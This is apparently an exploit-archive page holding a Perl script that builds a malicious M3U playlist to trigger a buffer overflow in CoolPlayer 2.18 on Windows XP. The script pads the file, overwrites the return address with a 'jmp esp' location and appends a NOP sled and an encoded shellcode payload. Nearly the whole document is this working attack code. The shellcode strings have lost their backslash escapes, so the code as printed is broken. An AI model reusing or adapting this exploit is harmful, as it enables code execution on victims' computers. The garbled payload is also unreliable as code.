[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit
# Published : 2009-12-22
# Author : data$hack
# Previous Title : Easy RM to MP3 2.7.3.700 BoF Exploit
# Next Title : PlayMeNow Malformed (M3U) Universal XP Seh BoF 


#!/usr/bin/perl
# Versions affected:        2.18
# Tested on:                Windows XP Pro SP2
# Author:                   data$hack
# Usage: expl.pl


my $file= "exs3.m3u";

my $junk= "A" x 223;
my $eip = pack('V',0x7C836940);  #jmp esp from kernel

my $shellcode = "x90" x 10;

$shellcode = $shellcode . "x33xc9xb8xa2xe0xe4x44xb1x33xdaxdfxd9x74x24" .
"xf4x5bx31x43x0ex03x43x0ex83x49x1cx06xb1x71" .
"x35x4ex3ax89xc6x31xb2x6cxf7x63xa0xe5xaaxb3" .
"xa2xabx46x3fxe6x5fxdcx4dx2fx50x55xfbx09x5f" .
"x66xcdx95x33xa4x4fx6ax49xf9xafx53x82x0cxb1" .
"x94xfexffxe3x4dx75xadx13xf9xcbx6ex15x2dx40" .
"xcex6dx48x96xbbxc7x53xc6x14x53x1bxfex1fx3b" .
"xbcxffxccx5fx80xb6x79xabx72x49xa8xe5x7bx78" .
"x94xaax45xb5x19xb2x82x71xc2xc1xf8x82x7fxd2" .
"x3axf9x5bx57xdfx59x2fxcfx3bx58xfcx96xc8x56" .
"x49xdcx97x7ax4cx31xacx86xc5xb4x63x0fx9dx92" .
"xa7x54x45xbaxfex30x28xc3xe1x9cx95x61x69x0e" .
"xc1x10x30x44x14x90x4ex21x16xaax50x01x7fx9b" .
"xdbxcexf8x24x0exabxe7xc6x9bxc1x8fx5ex4ex68" .
"xd2x60xa4xaexebxe2x4dx4ex08xfax27x4bx54xbc" .
"xd4x21xc5x29xdbx96xe6x7bxb8x79x75xe7x11x1c" .
"xfdx82x6d";


open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfullyn";